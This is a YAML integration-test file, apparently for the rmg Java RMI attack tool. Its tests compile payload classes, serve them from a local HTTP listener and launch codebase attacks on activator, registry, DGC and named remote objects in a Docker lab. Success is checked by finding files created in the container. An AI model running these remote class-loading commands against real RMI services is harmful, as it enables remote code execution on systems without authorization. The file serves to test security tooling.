tester:
  title: Codebase Tests
  description: |-
    'Performs tests for the codebase action.'

  id: '001-004'
  groups:
    - codebase
  id_pattern: '001-004-{:03}'


plugins:
  - os_command:
      cmd:
        - javac
        - -source
        - 1.8
        - -target
        - 1.8
        - '../../utils/${codebase-class}1.java'
        - '../../utils/${codebase-class}2.java'
        - '../../utils/${codebase-class}3.java'
        - '../../utils/${codebase-class}4.java'

  - http_listener:
      port: 8000
      dir: ../../utils


tests:
  - title: Activator Codebase Call
    description: |-
      'Performs a codebase attack on the activator endpoint.'
      'The expected result is a file being created within the docker'
      'volume.'

    command:
      - rmg
      - codebase
      - ${TARGET}
      - '${codebase-class}1'
      - 'http://${DOCKER-GW}:8000/'
      - --component
      - act
      - ${OPTIONS}

    validators:
      - error: False
      - regex:
          match:
            - 'Codebase attack.+successful'
      - file_exists:
          cleanup: True
          files:
            - '${volume}/${codebase-class}1.txt'


  - title: Registry Codebase Call
    description: |-
      'Performs a codebase attack on the registry endpoint.'
      'The expected result is a file being created within the docker'
      'volume.'

    command:
      - rmg
      - codebase
      - ${TARGET}
      - '${codebase-class}2'
      - 'http://${DOCKER-GW}:8000/'
      - --component
      - reg
      - ${OPTIONS}

    validators:
      - error: False
      - regex:
          match:
            - 'Codebase attack.+worked'
      - file_exists:
          cleanup: True
          files:
            - '${volume}/${codebase-class}2.txt'


  - title: DGC Codebase Call
    description: |-
      'Performs a codebase attack on the DGC endpoint.'
      'The expected result is an AccessControlException'

    command:
      - rmg
      - codebase
      - ${TARGET}
      - '${codebase-class}'
      - 'http://${DOCKER-GW}:8000/'
      - --component
      - dgc
      - ${OPTIONS}

    validators:
      - error: False
      - contains:
          values:
            - 'AccessControlException'
            - 'SecurityManager'


  - title: Method Codebase Call
    description: |-
      'Performs a codebase attack on the plain-server remote object.'
      'The expected result is a file being created within the docker'
      'volume.'

    command:
      - rmg
      - codebase
      - ${TARGET-SSL}
      - '${codebase-class}3'
      - 'http://${DOCKER-GW}:8000/'
      - --signature
      - 'String system(String dummy, String[] dummy2)'
      - --bound-name
      - plain-server
      - ${OPTIONS}

    validators:
      - error: False
      - contains:
          values:
            - 'load canary class'
            - 'attack probably worked'
      - file_exists:
          cleanup: True
          files:
            - '${volume}/${codebase-class}3.txt'


  - title: Method Codebase Call (Legacy)
    description: |-
      'Performs a codebase attack on the legacy-service remote object.'
      'The expected result is a file being created within the docker'
      'volume.'

    command:
      - rmg
      - codebase
      - ${TARGET}
      - '${codebase-class}4'
      - 'http://${DOCKER-GW}:8000/'
      - --signature
      - 'String login(java.util.HashMap dummy1)'
      - --bound-name
      - legacy-service
      - ${OPTIONS}

    validators:
      - error: False
      - contains:
          values:
            - 'load canary class'
            - 'attack probably worked'
      - file_exists:
          cleanup: True
          files:
            - '${volume}/${codebase-class}4.txt'


  - title: Missing Signature
    description: |-
      'Performs a codebase attack with missing --signature option and checks'
      'the corresponding error message.'

    command:
      - rmg
      - codebase
      - ${TARGET}
      - '${codebase-class}4'
      - 'http://${DOCKER-GW}:8000/'
      - ${OPTIONS}

    validators:
      - error: True
      - contains:
          values:
            - 'The specified aciton requires one of the --component, --objid, --bound-name options'


  - title: No Class Load
    description: |-
      'Performs a codebase attack with a wrong specified listener port.'

    command:
      - rmg
      - codebase
      - ${TARGET}
      - 'Test'
      - 'http://127.0.0.1:8002/'
      - --component
      - act
      - ${OPTIONS}

    validators:
      - error: False
      - contains:
          values:
            - 'Caught ClassNotFoundException'
            - 'not be loaded'
